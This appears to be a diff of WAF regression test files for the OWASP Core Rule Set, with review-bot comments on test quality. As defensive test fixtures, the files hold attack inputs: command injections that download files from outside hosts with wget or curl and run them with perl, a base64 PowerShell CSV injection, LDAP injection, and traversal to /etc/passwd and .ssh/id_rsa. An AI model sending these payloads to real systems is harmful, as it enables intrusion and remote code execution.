log_contains: id "921130"
-
test_title: 921130-3
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2
output:
log_contains: id "921130"
-
test_title: 921130-4
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2
output:
log_contains: id "921130"
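Review bot: Every test in this file asserts `log_contains`, so nothing here would fail if rule 921130 started matching benign traffic. 921120.yaml ends with a false-positive case (921120-3); this file should have one too, an ordinary request with `no_log_contains: id "921130"`. The same gap exists in 921160.yaml, 921190.yaml, 930120.yaml, 931110.yaml and 932200.yaml further down this commit. Tests 921130-3 and 921130-4 also reuse the requests of 921110-7 and 921110-8 under a "Request Smuggling" description, which deserves a comment saying why the response-splitting rule is expected to fire on them.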


@@ -0,0 +1,40 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "921140.yaml"
description: "Tests for protocol based attacks"
tests:
-
test_title: 921140-1
desc: "HTTP Header Injection Attack via headers"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
SomeHeader: "Headerdata\rInjectedHeader: response_splitting_code"
uri: "/"
output:
status: 400
no_log_contains: "id:921140"
-
test_title: 921140-2
desc: "HTTP Header Injection Attack via headers"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
SomeHeader: "Headerdata%0dInjectedHeader: response_splitting_code"
uri: "/"
output:
no_log_contains: "id:921140"
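Review bot: Both tests assert `no_log_contains: "id:921140"`, but every other file in this commit matches the log with the form `id "NNNNNN"`, so this pattern probably never appears in the log and the assertion passes whether or not the rule fires. Use `no_log_contains: "id \"921140\""` in 921140-1 and 921140-2. With that fixed the file still has no positive case. If the web server rejects the raw `\r` header before the rule runs, as the `status: 400` in 921140-1 suggests, say so in a comment so readers know the rule itself is not exercised here.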


@@ -0,0 +1,23 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "921150.yaml"
description: "Tests for protocol based attacks"
tests:
-
test_title: 921150-1
desc: "HTTP Header Injection Attack via payload"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata"
output:
log_contains: "id \"921150\""
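Review bot: The URI in 921150-1 contains `%0d%0restofdata`, where `%0r` is not a valid percent-escape, and the description does not say this is intended. 921160-1 uses the same construct and labels it "invalid line break", so it may be deliberate here too, but then the only payload tested is a bare CR. State that in the `desc`, and add a second test with a well-formed `%0d%0a` in the parameter name so the common case is pinned as well.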


@@ -0,0 +1,87 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "921160.yaml"
description: "Tests for protocol based attacks"
tests:
-
test_title: 921160-1
desc: "HTTP Header Injection Attack via payload: w/header, invalid line break, newlines after key"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com"
output:
log_contains: id "921160"
-
test_title: 921160-2
desc: "HTTP Header Injection Attack via payload: w/header, correct line break, newlines after key"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com"
output:
log_contains: id "921160"
-
test_title: 921160-3
desc: "HTTP Header Injection Attack via payload: w/header"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com"
output:
log_contains: id "921160"
-
test_title: 921160-4
desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in value rather than key"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com"
output:
log_contains: id "921160"
-
test_title: 921160-5
desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in key rather than value"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y"
output:
log_contains: id "921160"


@@ -0,0 +1,63 @@
---
meta:
author: "Andrea Menin (theMiddle)"
description: "HTTP Splitting"
enabled: true
name: 921190.yaml
tests:
-
test_title: 921190-1
desc: "New line char in request filename (1)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/foo%0Abar"
output:
log_contains: id "921190"
-
test_title: 921190-2
desc: "New line char in request filename (2)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/foo%0abar"
output:
log_contains: id "921190"
-
test_title: 921190-3
desc: "FastCGI variable injection: Nginx + PHP-FPM (CVE-2019-11043)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/index.php/PHP%0Ainfo.php?QQQ"
output:
log_contains: id "921190"
-
test_title: 921190-4
desc: "PHP Settings injection: Nginx + PHP-FPM (CVE-2019-11043)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ"
output:
log_contains: id "921190"
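Review bot: All four URIs carry a line feed (`%0A`/`%0a`), and 921190-1 and 921190-2 differ only in the case of the hex digit, so a carriage return in the request filename is never exercised. If the rule is meant to cover CR as well, which the "HTTP Splitting" description suggests, replace one of the two near-duplicates with a `%0D` case, e.g. `uri: "/foo%0Dbar"`. The stages also omit `method`, unlike the other files shown here, and rely on the harness default; adding `method: GET` makes the request explicit.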


@@ -0,0 +1,167 @@
---
meta:
author: "Christian Folini"
description: "LDAP injection"
enabled: true
name: 921200.yaml
tests:
-
test_title: 921200-1
desc: "Testing for FP, this should not trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
method: POST
data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))"
uri: "/"
output:
no_log_contains: id "921200"
-
test_title: 921200-2
desc: "Testing for FP, this should not trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
method: POST
data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)"
uri: "/"
output:
no_log_contains: id "921200"
-
test_title: 921200-3
desc: "Testing for FP, this should not trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
method: POST
data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))"
uri: "/"
output:
no_log_contains: id "921200"
-
test_title: 921200-4
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=bar)(%26)"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-5
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=printer)(uid=*)"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-6
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=void)(objectClass=users))(%26(objectClass=void)"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-7
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=eb9adbd87d)!(sn=*"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-8
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=*)!(sn=*"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-9
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=*)(uid=*))(|(uid=*"
uri: "/"
port: 80
output:
log_contains: id "921200"
-
test_title: 921200-10
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=aaa*aaa)(cn>=bob)"
uri: "/"
port: 80
output:
log_contains: id "921200"
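Review bot: The ten tests share two generic descriptions ("Testing for FP, this should not trigger" and "Testing for rule, this should trigger"), so a failing test id says nothing about which LDAP construct regressed. Give each `desc` the construct it covers, for example `desc: "FP: extensible-match filter with OID"` for 921200-1 and `desc: "Injection: closes the filter and appends (&)"` for 921200-4. The key order inside `input` also changes from test 921200-4 onward (`port` moves to the end); keeping one order makes the cases easier to compare.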


@@ -0,0 +1,23 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "930100.yaml"
description: "Application attack LFI"
tests:
-
test_title: 930100-1
desc: "Path Traversal Attack (/../) encoded"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
FoobarHeader: "0x5c0x2e.%00/"
uri: "/"
output:
log_contains: id "930100"
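Review bot: The description says "Path Traversal Attack (/../) encoded", but the header value `0x5c0x2e.%00/` is not an obvious encoding of `/../`, and it is the only case in the file. A comment should spell out what is sent, e.g. `# literal text "0x5c" (backslash) and "0x2e" (dot), then ".", an encoded NUL and "/"`. The usual percent-encoded forms of dot and slash are not covered; if the rule is meant to catch them, a second test for that form belongs here.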


@@ -0,0 +1,100 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "930110.yaml"
description: "Application attacks: Local file include"
tests:
-
test_title: 930110-1
desc: "Path Traversal Attack (/../)"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
FoobarHeader: "/../../../././..\\ ../../etc/master.passwd"
uri: "/"
output:
log_contains: id "930110"
-
test_title: 930110-2
desc: "Path Traversal Attack (/../) query string"
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
X-FTW: "This should trip"
uri: "/?arg=../../../etc/passwd"
output:
log_contains: id "930110"
-
test_title: 930110-3
desc: "Path Traversal Attack (/../) query string"
stages:
-
stage:
input:
dest_addr: "localhost"
method: "POST"
port: 80
headers:
Host: "localhost"
uri: "/"
data: "arg=../../../etc/passwd&foo=var"
output:
log_contains: id "930110"
-
test_title: 930110-4
desc: "Path Traversal Attack (/../) query string"
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/foo../1234"
output:
no_log_contains: id "930110"
-
test_title: 930110-5
desc: "Path Traversal Attack (/../) query string"
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/foo.../1234"
output:
no_log_contains: id "930110"
-
test_title: 930110-6
desc: "Path Traversal Attack (/../) query string"
stages:
-
stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/..foo"
output:
no_log_contains: id "930110"
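Review bot: Tests 930110-4, 930110-5 and 930110-6 assert `no_log_contains` on paths such as `/foo../1234`, yet they keep the description "Path Traversal Attack (/../) query string" copied from the positive cases. The payload is also in the path, not the query string. Describe them as false-positive checks, e.g. `desc: "FP: dots next to a path segment must not match"`. 931120-7 and 931120-8 in 931120.yaml have the same mislabelled negative cases. Separately, 930110-1 targets `127.0.0.1` while the other five use `dest_addr: "localhost"`; using one form avoids depending on how localhost resolves on the runner.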


@@ -0,0 +1,97 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 930120.yaml
tests:
-
test_title: 930120-1
desc: Remote File Access Attempt (930120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /index.php?file=News&op=../../../../../boot.ini%00
version: HTTP/1.1
output:
log_contains: id "930120"
-
test_title: 930120-2
desc: Remote File Access Attempt (930120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /index.php?file=News&op=/etc/passwd%00
version: HTTP/1.1
output:
log_contains: id "930120"
-
test_title: 930120-3
desc: Remote File Access Attempt (930120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /index.php?file=News&op=../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf%00
version: HTTP/1.1
output:
log_contains: id "930120"
-
test_title: 930120-4
desc: "OS File Access"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
uri: "/?foo=arg&path_comp=.ssh/id_rsa"
output:
log_contains: "930120"
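Review bot: 930120-4 asserts `log_contains: "930120"`, a bare number, while the other three tests in this file match `id "930120"`. The bare form also matches those digits anywhere else in a log line, so the test can pass without the rule having fired. Use `log_contains: id "930120"` to keep the assertion tied to the rule id field.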


@@ -0,0 +1,32 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 931100.yaml
tests:
-
test_title: 931100-1
desc: Remote File Inclusion Attack (931100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php
version: HTTP/1.1
output:
log_contains: id "931100"
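Review bot: The payload in 931100-1 embeds what looks like a real public address, `66.240.183.75`, presumably kept from the captured traffic this regression came from. The request goes to `127.0.0.1`, so the address is only a string, but a test corpus is better off with an address reserved for documentation, e.g. `src=http://192.0.2.1/crash.php`. The third-party hostnames in the 932100.yaml payloads could likewise become `example.com` names, provided the rules do not depend on the specific host.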


@@ -0,0 +1,82 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 931110.yaml
tests:
-
test_title: 931110-1
desc: Remote File Inclusion Attack (931110) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931110"
-
test_title: 931110-2
desc: Remote File Inclusion Attack (931110) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931110"
-
test_title: 931110-3
desc: Remote File Inclusion Attack (931110) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
*/*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931110"
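Review bot: 931110-3 is a copy of 931110-1, with the same headers, the same `uri` (`/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar`) and the same expected output. It adds run time but no coverage. Either drop it or change it to a parameter name that tests 1 and 2 do not already cover.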


@@ -0,0 +1,143 @@
---
meta:
author: studersi
description: None
enabled: true
name: 931120.yaml
tests:
-
test_title: 931120-1
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=file?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-2
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftp?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-3
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftps?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-4
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=http?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-5
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-6
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar?
version: HTTP/1.1
output:
log_contains: id "931120"
-
test_title: 931120-7
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar?foo=bar
version: HTTP/1.1
output:
no_log_contains: id "931120"
-
test_title: 931120-8
desc: Remote File Inclusion Attack (931120)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar&foo=bar
version: HTTP/1.1
output:
no_log_contains: id "931120"


@@ -0,0 +1,194 @@
---
meta:
author: studersi
description: None
enabled: true
name: 931130.yaml
tests:
-
test_title: 931130-1
desc: Remote File Inclusion Attack (931130)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=file://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-2
desc: Remote File Inclusion Attack (931130)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftp://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-3
desc: Remote File Inclusion Attack (931130)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=ftps://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-4
desc: Remote File Inclusion Attack (931130)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=http://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-5
desc: Remote File Inclusion Attack (931130)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
method: GET
port: 80
uri: /?x=https://foo.bar
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-6
desc: Partial match
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://evilexample.com/
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-7
desc: Mismatching domains
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com.evil.com/
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-8
desc: Mismatching ports
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com:1234/
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-9
desc: Matching hosts
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com/
version: HTTP/1.1
output:
no_log_contains: id "931130"
-
test_title: 931130-10
desc: Matching hosts and ports
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=https://example.com:1234/
version: HTTP/1.1
output:
log_contains: id "931130"
-
test_title: 931130-11
desc: Subdomains
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: example.com
method: GET
port: 80
uri: /?x=http://www.example.com/some/path
version: HTTP/1.1
output:
no_log_contains: id "931130"
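Review bot: 931130-10 ("Matching hosts and ports") sends exactly the request of 931130-8 ("Mismatching ports"), `Host: example.com` with `uri: /?x=https://example.com:1234/`, and expects the same `log_contains`. Host and port therefore do not match in either test, and the matching case is not covered. If the allowed case was intended, the test presumably needs `Host: example.com:1234` and `no_log_contains: id "931130"`; confirm against the rule before changing the expectation.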


@@ -0,0 +1,68 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 932100.yaml
tests:
-
test_title: 932100-1
desc: System Command Injection (932100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf
version: HTTP/1.0
output:
log_contains: id "932100"
-
test_title: 932100-2
desc: System Command Injection (932100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php
version: HTTP/1.0
output:
log_contains: id "932100"
-
# Currently this will be blocked by apache before it gets
# to CRS. as a result we need to check for 400 from Apache
# We ideally want a OR output check.
# https://github.com/CRS-support/ftw/issues/19
test_title: 932100-3
desc: CSV Injection Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
encoded_request: "UE9TVCAvaW5kZXguaHRtbCBIVFRQLzEuMQpIb3N0OiAxOTIuMTY4LjEuMjMKVXNlci1BZ2VudDogY3VybC83LjQzLjAKQWNjZXB0OiAqLyoKQ29udGVudC1MZW5ndGg6IDY0CkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkCkNvbm5lY3Rpb246IGNsb3NlCgpkPTE7MjszOzQ7NVxuMTtAU1VNKDErMSkqY21kfCcgcG93ZXJzaGVsbCBJRVgod2dldCAwci5wZS9wKSdcIUEwOzM="
output:
status: [403, 400]
#log_contains: id "932100"
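Review bot: 932100-3 only asserts `status: [403, 400]` and has `log_contains` commented out, so, as the comment above it admits, it passes on Apache's own 400 and never shows that rule 932100 matched. It would keep passing if the rule were removed. Until the harness supports the OR check mentioned in the comment, label the test as a server-behaviour check in its `desc`, or disable it, rather than counting it as rule coverage. The `encoded_request` blob should also carry a comment summarising the decoded request, so reviewers need not decode base64 to see what is sent.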


@@ -0,0 +1,61 @@
---
meta:
author: theMiddle
description: RCE Bypass
enabled: true
name: 932200.yaml
tests:
-
test_title: 932200-1
desc: globbing patterns
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?host=www.google.com;/bin/ca?+/et*/passwd
version: HTTP/1.0
output:
log_contains: id "932200"
-
test_title: 932200-2
desc: uninitialized variable
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
